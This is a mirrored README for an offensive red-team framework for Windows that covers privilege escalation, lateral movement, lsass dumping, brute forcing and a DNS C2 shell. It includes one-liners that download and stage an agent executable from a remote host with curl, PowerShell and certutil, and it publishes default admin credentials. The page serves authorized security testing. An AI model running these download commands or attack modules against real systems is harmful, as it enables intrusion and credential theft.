Coder Social home page Coder Social logo

lawrenceamer / 0xsp-mongoose Goto Github PK

View Code? Open in Web Editor NEW
530.0 28.0 122.0 27.01 MB

a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.

Home Page: https://0xsp.com

License: GNU General Public License v3.0

HTML 0.75% CSS 0.01% JavaScript 9.21% Pascal 87.87% Shell 0.09% Batchfile 0.29% Python 1.78%
privilege-escalation toolkit security-tools security-audit windows 0xsp-mongoose webapi agent mongoose redteaming windows-vulnerability redteam lateral-movement impersonation backdoor-attacks

0xsp-mongoose's Introduction

GPLv3 license

Support the project for continuous development (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED for Windows

Current Release 2.2.0

0xsp mongoose red version is provided to assist your needs during cyber security simulation, by using this version you will be able to audit a targeted windows operation system for system vulnerabilities, misconfigurations and privilege escalation attacks and replicate the tactics and techniques of an advanced adversary in a network.

with node js support for web application API, it becomes much easier for installation and customization in timely manner, the windows sensor agent will communicate with application API to transfer results, and receive commands as bidirectional technique.

the agent is able to identify and detect windows exploits by using windows update api and exploit database definitions modules, the new release will detect also the following vulnerabilities.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Features

  • Windows Privilege escalation scanning techniques.
  • web application built with NodeJS
  • supports sqlite DB
  • Lateral movements techniques. video
  • Bidirectional communication channel. video
  • Plugins online packaging.
  • Enhanced exploit detecter scripting engine.
  • Windows Account Bruteforce Module (Local / Domain)
  • weaponization of run-as-user windows api function. Video
  • local network scanning and shares enumeration.
  • lsass memory dummping technique (plugin).
  • DNS C2C interactive shellmode

installation

git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

default access credentials :

  • username : admin
  • password : 0xsp

DNS C2C python script

touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

quick deploy of agent

#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Usage

-s --retrieve windows services and installed drivers.
-u --retrieve information about Users, groups, roles.
-c --search connected drivers for senstive config files by extension.
-n --retrieve network information,network interfaces, connection details.
-w --enumerate for writeable directories, access permission Check, modified permissions.
-i --enumerate windows system information, Sessions, Always elvated check.
-l --search in any file for specific string , ex : agent.exe -l c:\ password *.config.
-o --specify host address of nodejs application , you can use srvhost also
-p --enumerate installed Softwares, Running Processes, Tasks.
-e --kernel inspection Tool, it will help to search through tool databases for windows kernel vulnerabilities
-x --password to authorize your connection with node js application.
-d --download Files directly into target machine.
-t --upload Files From target machine into node js application.
-spooler --scan single host or list of hosts for possible CVE-2021-1675 (e.g -spooler -srvhost or -spooler -hosts )
-m --run all known scan Types together.

[!] RED TEAMING TACTICS SECTION

-r --spawn a reverse shell with specific account.
-lr --Lateral movement technique using WMI (e.g -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --network discovery and share enumeration
-dns --establish interactive dns C2C shell
-cmd --transfer commands via HTTP Shell
-interactive --starting interactive mode (eg : loading plugins ..etc)
-username --identity authentication for specific attack modules.
-password --identity authentication for specific attack modules.
-host --identify remote host to conduct an attack to.
-srvhost --set rhost of node js application.
-bf --local users / domain users bruteforce module
-import --import and execute dll file locally
-remote --import and execute dll file from remote host

Documentations

https://0xsp.com/security%20dev/0xsp-mongoose-red

detailed research site

https://0xsp.com

Security Conferences

tool tutorials

make sure to subscribe into the following channel to be notified when new tutorial and tricks published for 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.